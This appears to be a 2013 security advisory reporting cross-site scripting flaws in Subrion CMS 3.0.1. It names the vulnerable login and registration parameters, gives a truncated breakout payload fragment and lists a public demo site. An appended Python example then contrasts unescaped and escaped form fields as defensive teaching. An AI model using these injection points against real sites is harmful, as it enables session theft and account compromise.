Subrion CMS 3.0.1 - Multiple Cross-Site Scripting Vulnerabilities
Author : syst3m_f4ult
Homepage : http://www.subrion.com/
Vendor : subrion
Version : 3.0.1 (probably all versions)
Tested on : Ubuntu 12.04
Date : 2013-10-10
-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------
Two pages are vulnerable to XSS (Method: POST):
http://localhost/login/ [username parameter]
http://localhost/registration/ [username and email parameters]
Malicious Code:
">
Demo:
http://cms.subrion.com/login/
http://cms.subrion.com/registration/
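As an added defensive illustration (not code from the advisory or from Subrion), the Python below shows why a submitted username beginning with the `">` fragment above is dangerous when a login or registration form re-populates its input fields, and how attribute-context escaping contains it. The form markup, the sample username and the parser are assumptions for the demonstration, not Subrion's own templates.

```python
import html
from html.parser import HTMLParser

# Constructed sample input (not from the advisory): a username that starts
# with the '">' fragment the advisory shows. Reflected unescaped into a
# value="..." attribute, it closes the attribute and the <input> tag.
SAMPLE_USERNAME = '">constructed_breakout'


def render_field_vulnerable(name, value):
    """Re-populate a form field as a vulnerable template might: the
    submitted value is interpolated into value="..." verbatim."""
    return f'<input type="text" name="{name}" value="{value}">'


def render_field_hardened(name, value):
    """Same field, with the value HTML-escaped for attribute context.
    quote=True encodes both " and ', so the value cannot terminate the
    attribute it is placed in."""
    return f'<input type="text" name="{name}" value="{html.escape(value, quote=True)}">'


class _FieldParser(HTMLParser):
    """Records what a browser would see: the value attribute of each
    <input>, plus any text that landed outside a tag."""

    def __init__(self):
        super().__init__()
        self.values = []
        self.stray = ''

    def handle_starttag(self, tag, attrs):
        if tag == 'input':
            self.values.append(dict(attrs).get('value', ''))

    def handle_data(self, data):
        self.stray += data


def parse_field(rendered):
    """Return (list of <input> values, stray text) for a rendered fragment.
    A correctly escaped field yields exactly one value equal to the
    submitted string and no stray text; a broken-out field does not."""
    p = _FieldParser()
    p.feed(rendered)
    p.close()
    return p.values, p.stray.strip()
```

Running `parse_field` over both renderings of `SAMPLE_USERNAME` shows the vulnerable field ending with an empty value and the remainder of the input outside the tag, while the hardened field keeps the entire string inside the attribute.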